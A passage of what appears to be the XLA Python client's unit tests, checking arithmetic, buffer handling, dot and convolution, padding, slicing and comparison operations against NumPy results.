} for dtype in float_dtypes)
def testSum2DWith1DBroadcastDim0(self, dtype):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
ops.Add(
ops.Constant(c,
np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]],
dtype=dtype)),
ops.Constant(c, np.array([10, 20, 30], dtype=dtype)),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[[11, 12, 13], [24, 25, 26], [37, 38, 39]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSum2DWith1DBroadcastDim1(self, dtype):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
ops.Add(
ops.Constant(c,
np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]],
dtype=dtype)),
ops.Constant(c, np.array([10, 20, 30], dtype=dtype)),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[[11, 22, 33], [14, 25, 36], [17, 28, 39]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantAxpy(self, dtype):
c = self._NewComputation()
ops.Add(
ops.Mul(
ops.Constant(c, dtype(2)),
ops.Constant(c, np.array([2.2, 3.3, 4.4, 5.5], dtype=dtype))),
ops.Constant(c, np.array([100, -100, 200, -200], dtype)))
self._ExecuteAndCompareClose(
c, expected=[[104.4, -93.4, 208.8, -189]], rtol=2e-3)
def testCustomCall(self):
if self.backend.platform != "cpu":
self.skipTest("Test requires cpu platform")
c = self._NewComputation()
for name, fn in custom_call_for_test.cpu_custom_call_targets.items():
xla_client.register_custom_call_target(name, fn, platform="cpu")
ops.CustomCallWithLayout(
c,
b"test_subtract_f32",
operands=[
ops.Constant(c, np.float32(1.25)),
ops.Constant(c, np.float32(0.5))
],
shape_with_layout=xla_client.Shape.array_shape(
np.dtype(np.float32), (), ()),
operand_shapes_with_layout=[
xla_client.Shape.array_shape(np.dtype(np.float32), (), ()),
xla_client.Shape.array_shape(np.dtype(np.float32), (), ()),
])
self._ExecuteAndCompareClose(c, expected=[0.75])
tests.append(ComputationsWithConstantsTest)
class ComputationFromProtoTest(absltest.TestCase):
"""Test computation execution from HLO proto."""
def setUp(self):
super(ComputationFromProtoTest, self).setUp()
self.backend = xla_backend()
def testExecuteFromProto(self):
# Build the HLO proto
b = xla_client.XlaBuilder("computation")
ops.Add(ops.Constant(b, np.int32(1)), ops.Constant(b, np.int32(2)))
serialized_proto = b.build().as_serialized_hlo_module_proto()
# Load and execute the proto
c = xla_client.XlaComputation(serialized_proto)
ans, = xla_client.execute_with_python_values(
self.backend.compile(c), (), backend=self.backend)
np.testing.assert_equal(ans, np.int32(3))
tests.append(ComputationFromProtoTest)
class ParametersTest(ComputationTest):
"""Tests focusing on Parameter ops and argument-passing."""
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes)
def testScalarTimesVector(self, dtype):
c = self._NewComputation()
arg0 = np.array(3, dtype=dtype)
arg1 = np.array([10, 15, -2, 7], dtype=dtype)
p0 = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg0))
p1 = ops.Parameter(c, 1, xla_client.shape_from_pyval(arg1))
ops.Mul(p0, p1)
self._ExecuteAndCompareExact(
c, arguments=[arg0, arg1], expected=[arg0 * arg1])
# TODO(phawkins): test comparison harness doesn't support bfloat16
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes if dtype != bfloat16)
def testScalarMinusVectorExplicitNumbering(self, dtype):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
arg0 = np.array(2.0, dtype=dtype)
arg1 = np.array([-2.3, 3.3, -4.3, 5.3], dtype=dtype)
p1 = ops.Parameter(c, 1, xla_client.shape_from_pyval(arg1))
p0 = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg0))
ops.Sub(p1, p0)
self._ExecuteAndCompareClose(
c, arguments=[arg0, arg1], expected=[arg1 - arg0])
tests.append(ParametersTest)
class BufferTest(ComputationTest):
"""Tests focusing on execution with Buffers."""
def testConstantSum(self):
c = self._NewComputation()
ops.Add(
ops.Constant(c, np.float32(1.11)), ops.Constant(c, np.float32(3.14)))
self._ExecuteAndCompareClose(c, expected=[4.25])
def testOneParameterSum(self):
c = self._NewComputation()
ops.Add(
ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0.))),
ops.Constant(c, np.float32(3.14)))
self._ExecuteAndCompareClose(
c, arguments=[NumpyArrayF32(1.11)], expected=[4.25])
def testTwoParameterSum(self):
c = self._NewComputation()
ops.Add(
ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0.))),
ops.Parameter(c, 1, xla_client.shape_from_pyval(NumpyArrayF32(0.))))
self._ExecuteAndCompareClose(
c,
arguments=[NumpyArrayF32(1.11),
NumpyArrayF32(3.14)],
expected=[4.25])
@unittest.skipIf(cloud_tpu, "not implemented")
def testCannotCallWithDeletedBuffers(self):
c = self._NewComputation()
ops.Add(
ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0.))),
ops.Constant(c, np.float32(3.14)))
arg = NumpyArrayF32(1.11)
compiled_c = self.backend.compile(c.build())
arg_buffer = self.backend.buffer_from_pyval(arg)
arg_buffer.delete()
with self.assertRaises(RuntimeError):
compiled_c.execute([arg_buffer])
def testXlaShape(self):
pyval = np.array([[1., 2.]], np.float32)
local_buffer = self.backend.buffer_from_pyval(pyval)
xla_shape = local_buffer.xla_shape()
self.assertEqual(xla_shape.dimensions(), (1, 2))
self.assertEqual(np.dtype(xla_shape.element_type()), np.dtype(np.float32))
def testBlockHostUntilReadyWorks(self):
arg = np.array([[1., 2.]], np.float32)
arg_buffer = self.backend.buffer_from_pyval(arg)
arg_buffer.block_host_until_ready()
# This test merely checks that nothing goes awry when we call
# block_host_until_ready(); it's difficult to test anything else.
def testBlockHostUntilReadyRaisesOnDeletedBuffer(self):
arg = np.array([[1., 2.]], np.float32)
buffer = self.backend.buffer_from_pyval(arg)
buffer.delete()
with self.assertRaisesRegex(
RuntimeError,
re.escape(
"BlockHostUntilReady() called on deleted or donated buffer")):
buffer.block_host_until_ready()
def testDeviceArrayBaseSignatures(self):
# When extending `DeviceArrayBase`, the object behaves as a `DeviceArray`
# and thus needs to correctly implement the following methods.
arg = np.array([[1., 2., 3.]], np.float32)
buffer = self.backend.buffer_from_pyval(arg)
if not isinstance(buffer, xla_client.DeviceArrayBase):
raise unittest.SkipTest(
"The objectof type {} do not extend DeviceArrayBase".format(
type(buffer)))
self.assertEqual(buffer.__array_priority__, 100)
self.assertEqual(buffer.shape, (1, 3))
self.assertEqual(buffer.dtype, np.float32)
self.assertEqual(buffer.size, 3)
self.assertEqual(buffer.ndim, 2)
self.assertIs(buffer, buffer.block_until_ready())
buffer.delete()
with self.assertRaises(RuntimeError):
buffer.block_until_ready()
def testCopyToHost(self):
arg0 = np.array([[1., 2.]], np.float32)
arg1 = np.array([[3., 4.]], np.float32)
arg0_buffer = self.backend.buffer_from_pyval(arg0)
arg1_buffer = self.backend.buffer_from_pyval(arg1)
# Prefetch two buffers using copy_to_host_async, and then retrieve their
# values using to_py.
arg0_buffer.copy_to_host_async()
arg0_buffer.copy_to_host_async() # Duplicate calls don't do anything.
arg1_buffer.copy_to_host_async()
np.testing.assert_equal(arg0, arg0_buffer.to_py())
np.testing.assert_equal(arg1, arg1_buffer.to_py())
# copy_to_host_async does nothing after to_py is called.
arg0_buffer.copy_to_host_async()
np.testing.assert_equal(arg0, arg0_buffer.to_py())
def testDevice(self):
x = np.arange(8, dtype=np.int32)
for device in self.backend.local_devices():
buf = self.backend.buffer_from_pyval(x, device=device)
self.assertEqual(buf.device(), device)
np.testing.assert_equal(x, buf.to_py())
def testStandardTypes(self):
for dtype in standard_dtypes:
if dtype == bfloat16 or dtype == np.complex128:
continue
arr = self.backend.buffer_from_pyval(np.array([0, 1], dtype))
arr = arr.to_py()
self.assertEqual(dtype, type(arr[0]))
tests.append(BufferTest)
class SingleOpTest(ComputationTest):
"""Tests for single ops.
The goal here is smoke testing - to exercise the most basic functionality of
single XLA ops. As minimal as possible number of additional ops are added
around the op being tested.
"""
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConcatenate(self, dtype):
c = self._NewComputation()
args = (
ops.Constant(c, np.array([1.0, 2.0, 3.0], dtype=dtype)),
ops.Constant(c, np.array([4.0, 5.0, 6.0], dtype=dtype)),
)
ops.ConcatInDim(c, args, dimension=0)
self._ExecuteAndCompareExact(
c, expected=[np.array([1.0, 2.0, 3.0, 4.0, 5.0, 6.0], dtype=dtype)])
# pyformat: disable
@parameterized.named_parameters({
"testcase_name": "_{}_{}".format(src_dtype.__name__,
dst_dtype.__name__),
"src_dtype": src_dtype,
"dst_dtype": dst_dtype,
} for src_dtype, dst_dtype in itertools.permutations(
[np.bool, np.int32, np.int64, np.float32, np.float64], 2))
# pyformat: enable
def testConvertElementType(self, src_dtype, dst_dtype):
if ((src_dtype in [np.int64, np.float64] or
dst_dtype in [np.int64, np.float64]) and
self.backend.platform == "tpu"):
self.skipTest("TPU doesn't support float64")
c = self._NewComputation()
x = np.array([0, 1, 0, 0, 1], dtype=src_dtype)
ops.ConvertElementType(
ops.Constant(c, x), xla_client.dtype_to_etype(dst_dtype))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 1)
expected = np.array(x, dtype=dst_dtype)
self.assertEqual(result[0].shape, expected.shape)
self.assertEqual(result[0].dtype, expected.dtype)
np.testing.assert_equal(result[0], expected)
# pyformat: disable
@parameterized.named_parameters(
{
"testcase_name": "_{}_{}".format(src_dtype.__name__,
dst_dtype.__name__),
"src_dtype": src_dtype,
"dst_dtype": dst_dtype,
}
for dtypes in [[np.int32, np.float32], [np.int64, np.float64]]
for src_dtype, dst_dtype in itertools.permutations(dtypes, 2))
# pyformat: enable
def testBitcastConvertType(self, src_dtype, dst_dtype):
if (np.float64 in (src_dtype, dst_dtype) and
self.backend.platform == "tpu"):
self.skipTest("TPU doesn't support float64")
c = self._NewComputation()
x = np.array([0, 1, 0, 0, 1], dtype=src_dtype)
ops.BitcastConvertType(
ops.Constant(c, x), xla_client.dtype_to_etype(dst_dtype))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 1)
expected = x.view(dst_dtype)
self.assertEqual(result[0].shape, expected.shape)
self.assertEqual(result[0].dtype, expected.dtype)
np.testing.assert_equal(result[0], expected)
# TODO(b/123523486) implement AllToAll on CPU
def DISABLED_testAllToAllOneReplica(self):
samples = [
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples[:1]:
c = self._NewComputation()
ops.AllToAll(ops.Constant(c, lhs), 0, 0)
self._ExecuteAndCompareExact(c, expected=[lhs])
def testCrossReplicaSumOneReplica(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
ops.CrossReplicaSum(ops.Constant(c, lhs))
self._ExecuteAndCompareExact(c, expected=[lhs])
def testReplicaId(self):
c = self._NewComputation()
_ = ops.ReplicaId(c)
self._ExecuteAndCompareExact(c, expected=[0])
def testCrossReplicaSumOneReplicaWithSingletonGroup(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
ops.CrossReplicaSum(
ops.Constant(c, lhs), xla_client.make_replica_groups([[0]]))
self._ExecuteAndCompareExact(c, expected=[lhs])
# TODO(phawkins): np.dot implementation doesn't support bfloat16
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes if dtype != bfloat16)
def testDotMatrixVector(self, dtype):
c = self._NewComputation()
lhs = np.array([[2.0, 3.0], [4.0, 5.0]], dtype=dtype)
rhs = np.array([[10.0], [20.0]], dtype=dtype)
ops.Dot(ops.Constant(c, lhs), ops.Constant(c, rhs))
self._ExecuteAndCompareClose(c, expected=[np.dot(lhs, rhs)])
# TODO(phawkins): np.dot implementation doesn't support bfloat16
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes if dtype != bfloat16)
def testDotMatrixMatrix(self, dtype):
c = self._NewComputation()
lhs = np.array([[2.0, 3.0], [4.0, 5.0]], dtype=dtype)
rhs = np.array([[10.0, 20.0], [100.0, 200.0]], dtype=dtype)
ops.Dot(ops.Constant(c, lhs), ops.Constant(c, rhs))
self._ExecuteAndCompareClose(c, expected=[np.dot(lhs, rhs)])
def testDotGeneral(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.make_dot_dimension_numbers(
(([2], [1]), ([0], [0])))
ops.DotGeneral(
ops.Constant(c, lhs), ops.Constant(c, rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=[np.matmul(lhs, rhs)], rtol=1e-6)
def testDotGeneralWithDotDimensionNumbersProto(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.DotDimensionNumbers()
dimension_numbers.lhs_contracting_dimensions.append(2)
dimension_numbers.rhs_contracting_dimensions.append(1)
dimension_numbers.lhs_batch_dimensions.append(0)
dimension_numbers.rhs_batch_dimensions.append(0)
ops.DotGeneral(
ops.Constant(c, lhs), ops.Constant(c, rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=[np.matmul(lhs, rhs)], rtol=1e-6)
def testDotGeneralWithPrecisionConfig(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.make_dot_dimension_numbers(
(([2], [1]), ([0], [0])))
config = xla_client.PrecisionConfig()
config.operand_precision.append(config.Precision.HIGH)
config.operand_precision.append(config.Precision.HIGHEST)
ops.DotGeneral(
ops.Constant(c, lhs),
ops.Constant(c, rhs),
dimension_numbers,
precision_config=config)
self._ExecuteAndCompareClose(c, expected=[np.matmul(lhs, rhs)], rtol=1e-6)
def testConvGeneralDilatedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = xla_client.make_convolution_dimension_numbers(
("NCHW", "OIHW", "NCHW"), 2)
ops.ConvGeneralDilated(
ops.Constant(c, lhs), ops.Constant(c, rhs), strides, pads,
lhs_dilation, rhs_dilation, dimension_numbers)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
]]])
self._ExecuteAndCompareClose(c, expected=[result])
def testConvGeneralDilatedF32WithPrecisionConfig(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = xla_client.make_convolution_dimension_numbers(
("NCHW", "OIHW", "NCHW"), 2)
config = xla_client.PrecisionConfig()
config.operand_precision.append(config.Precision.HIGHEST)
config.operand_precision.append(config.Precision.DEFAULT)
ops.ConvGeneralDilated(
ops.Constant(c, lhs),
ops.Constant(c, rhs),
strides,
pads,
lhs_dilation,
rhs_dilation,
dimension_numbers,
precision_config=config)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
]]])
self._ExecuteAndCompareClose(c, expected=[result])
def testConvGeneralDilatedPermutedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = xla_client.make_convolution_dimension_numbers(
("NHWC", "OIHW", "CWNH"), 2)
ops.ConvGeneralDilated(
ops.Constant(c, np.transpose(lhs,
(0, 2, 3, 1))), ops.Constant(c, rhs),
strides, pads, lhs_dilation, rhs_dilation, dimension_numbers)
result = np.array([[[[0., 0., 0.], [10., 20., 0.], [0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(
c, expected=[np.transpose(result, (1, 3, 0, 2))])
def testConvGeneralDilatedGroupedConvolutionF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 2, 3)
rhs = a(2, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = xla_client.make_convolution_dimension_numbers(
("NCHW", "OIHW", "NCHW"), 2)
feature_group_count = 2
ops.ConvGeneralDilated(
ops.Constant(c, lhs), ops.Constant(c, rhs), strides, pads,
lhs_dilation, rhs_dilation, dimension_numbers, feature_group_count)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
], [
[0., 0., 0.],
[330., 380., 160.],
[0., 0., 0.],
[480., 530., 220.],
]]])
self._ExecuteAndCompareClose(c, expected=[result])
def testBooleanNot(self):
c = self._NewComputation()
arr = NumpyArrayBool([True, False, True])
ops.Not(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[~arr])
def testPopulationCount(self):
c = self._NewComputation()
arr = NumpyArrayS32([3, 0, 1])
ops.PopulationCount(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.array([2, 0, 1])])
def testCountLeadingZeros(self):
c = self._NewComputation()
arr = NumpyArrayS32([0x7FFF, 0x12345678])
ops.Clz(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[[17, 3]])
def testExp(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Exp(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.exp(arr)])
def testExpm1(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Expm1(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.expm1(arr)])
def testRound(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Round(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.round(arr)])
def testLog(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Log(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.log(arr)])
def testLog1p(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Log1p(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.log1p(arr)])
def testNeg(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Neg(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[-arr])
def testFloor(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Floor(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.floor(arr)])
def testCeil(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Ceil(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.ceil(arr)])
def testAbs(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, -12.1, 2.4, -1.])
ops.Abs(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.abs(arr)])
def testTanhF32(self):
c = self._NewComputation()
arr = NumpyArrayF32([-0.2, 3.3, 12.1, 0.1, 0.0001])
ops.Tanh(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.tanh(arr)])
def testTanhF64(self):
if self.backend.platform == "tpu":
self.skipTest("TPU doesn't support 64bit tanh")
c = self._NewComputation()
arr = NumpyArrayF64([-0.2, 3.3, 12.1, 0.1, 0.0001])
ops.Tanh(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.tanh(arr)], rtol=1e-12)
def testTranspose(self):
def _TransposeAndTest(array, permutation):
c = self._NewComputation()
ops.Transpose(ops.Constant(c, array), permutation)
expected = np.transpose(array, permutation)
self._ExecuteAndCompareClose(c, expected=[expected])
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [1, 0])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [1, 0])
arr = np.random.RandomState(0).randn(2, 3, 4).astype(np.float32)
for permutation in itertools.permutations(range(arr.ndim)):
_TransposeAndTest(arr, permutation)
_TransposeAndTest(np.asfortranarray(arr), permutation)
def testEq(self):
c = self._NewComputation()
ops.Eq(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4])),
ops.Constant(c, NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[[False, True, True, False]])
def testNe(self):
c = self._NewComputation()
ops.Ne(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4])),
ops.Constant(c, NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[[True, False, False, True]])
ops.Ne(
ops.Constant(c, NumpyArrayF32([-2.0, 0.0,
float("nan"),
float("nan")])),
ops.Constant(c, NumpyArrayF32([2.0, -0.0, 1.0,
float("nan")])))
self._ExecuteAndAssertWith(
np.testing.assert_allclose,
c, (),
expected=[[True, False, True, True]])
def testGt(self):
c = self._NewComputation()
ops.Gt(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[False, True, True, False, False]])
def testGe(self):
c = self._NewComputation()
ops.Ge(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[True, True, True, False, False]])
def testLt(self):
c = self._NewComputation()
ops.Lt(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[False, False, False, True, True]])
def testLe(self):
c = self._NewComputation()
ops.Le(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[True, False, False, True, True]])
def testMax(self):
c = self._NewComputation()
ops.Max(
ops.Constant(c, NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
ops.Constant(c, NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[[1.0, 2.0, 3.0, 7.0, 12.0]])
def testMaxExplicitBroadcastDim0(self):
c = self._NewComputation()
ops.Max(
ops.Constant(c, NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
ops.Constant(c, NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareExact(
c, expected=[[[3, 3, 3], [4, 5, 6], [7, 8, 9]]])
def testMaxExplicitBroadcastDim1(self):
c = self._NewComputation()
ops.Max(
ops.Constant(c, NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
ops.Constant(c, NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareExact(
c, expected=[[[3, 4, 5], [4, 5, 6], [7, 8, 9]]])
def testMin(self):
c = self._NewComputation()
ops.Min(
ops.Constant(c, NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
ops.Constant(c, NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[[1.0, 0.0, 2.0, 4.0, 9.0]])
def testPad(self):
c = self._NewComputation()
ops.Pad(
ops.Constant(c, NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
ops.Constant(c, NumpyArrayF32(0.0)),
xla_client.make_padding_config([(1, 2, 1), (0, 1, 0)]))
self._ExecuteAndCompareClose(
c,
expected=[[[0.0, 0.0, 0.0], [1.0, 2.0, 0.0], [0.0, 0.0, 0.0],
[3.0, 4.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]]])
def testPadWithPaddingConfig(self):
c = self._NewComputation()
padding_config = xla_client.PaddingConfig()
for lo, hi, interior in [(1, 2, 1), (0, 1, 0)]:
dimension = xla_client.PaddingConfigDimension()
dimension.edge_padding_low = lo
dimension.edge_padding_high = hi
dimension.interior_padding = interior
padding_config.dimensions.append(dimension)
ops.Pad(
ops.Constant(c, NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
ops.Constant(c, NumpyArrayF32(0.0)), padding_config)
self._ExecuteAndCompareClose(
c,
expected=[[[0.0, 0.0, 0.0], [1.0, 2.0, 0.0], [0.0, 0.0, 0.0],
[3.0, 4.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]]])
def testReshape(self):
c = self._NewComputation()
ops.Reshape(
ops.Constant(c, NumpyArrayS32([[1, 2], [3, 4], [5, 6]])),
dimensions=[0, 1],
new_sizes=[2, 3])
self._ExecuteAndCompareExact(c, expected=[[[1, 2, 3], [4, 5, 6]]])
def testCollapse(self):
c = self._NewComputation()
ops.Collapse(
ops.Constant(c, NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[1, 2])
self._ExecuteAndCompareExact(c, expected=[[[1, 2, 3, 4], [5, 6, 7, 8]]])
def testRev(self):
c = self._NewComputation()
ops.Rev(
ops.Constant(c, NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[0, 2])
self._ExecuteAndCompareExact(
c, expected=[[[[6, 5], [8, 7]], [[2, 1], [4, 3]]]])
def testReducePrecision(self):
c = self._NewComputation()
ops.ReducePrecision(
ops.Constant(c, NumpyArrayF32([float.fromhex("0x1.32fffep-3")])),
exponent_bits=8,
mantissa_bits=7)
self._ExecuteAndCompareClose(c, expected=[[float.fromhex("0x1.32p-3")]])
def testClampF32(self):
c = self._NewComputation()
ops.Clamp(
ops.Constant(c, NumpyArrayF32(-1)),
ops.Constant(c, NumpyArrayF32([-2, -1, 0, 1, 2, 3])),
ops.Constant(c, NumpyArrayF32(2)))
self._ExecuteAndCompareExact(c, expected=[[-1, -1, 0, 1, 2, 2]])
def testClampS32(self):
c = self._NewComputation()
ops.Clamp(
ops.Constant(c, NumpyArrayS32(-1)),
ops.Constant(c, NumpyArrayS32([-2, -1, 0, 1, 2, 3])),
ops.Constant(c, NumpyArrayS32(2)))
self._ExecuteAndCompareExact(c, expected=[[-1, -1, 0, 1, 2, 2]])
def testSelect(self):
c = self._NewComputation()
ops.Select(
ops.Constant(c, NumpyArrayBool([True, False, False, True, False])),
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 5])),
ops.Constant(c, NumpyArrayS32([-1, -2, -3, -4, -5])))
self._ExecuteAndCompareExact(c, expected=[[1, -2, -3, 4, -5]])
def testSlice(self):
c = self._NewComputation()
ops.Slice(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
[1, 0], [3, 2], [1, 1])
self._ExecuteAndCompareExact(c, expected=[[[4, 5], [7, 8]]])
def testSliceInDim(self):
c = self._NewComputation()
ops.SliceInDim(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=1,
limit_index=2,
stride=1,
dimno=1)
self._ExecuteAndCompareExact(c, expected=[[[2], [5], [8]]])
ops.SliceInDim(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=0,
limit_index=3,
stride=2,
dimno=0)
self._ExecuteAndCompareExact(c, expected=[[[1, 2, 3], [7, 8, 9]]])
def testDynamicSlice(self):
c = self._NewComputation()
ops.DynamicSlice(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
[ops.Constant(c, NumpyArrayS32([1, 0]))], [2, 2])
self._ExecuteAndCompareExact(c, expected=[[[4, 5], [7, 8]]])
def testDynamicUpdateSlice(self):
c = self._NewComputation()
ops.DynamicUpdateSlice(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
ops.Constant(c, NumpyArrayS32([[1, 2], [3, 4]])),
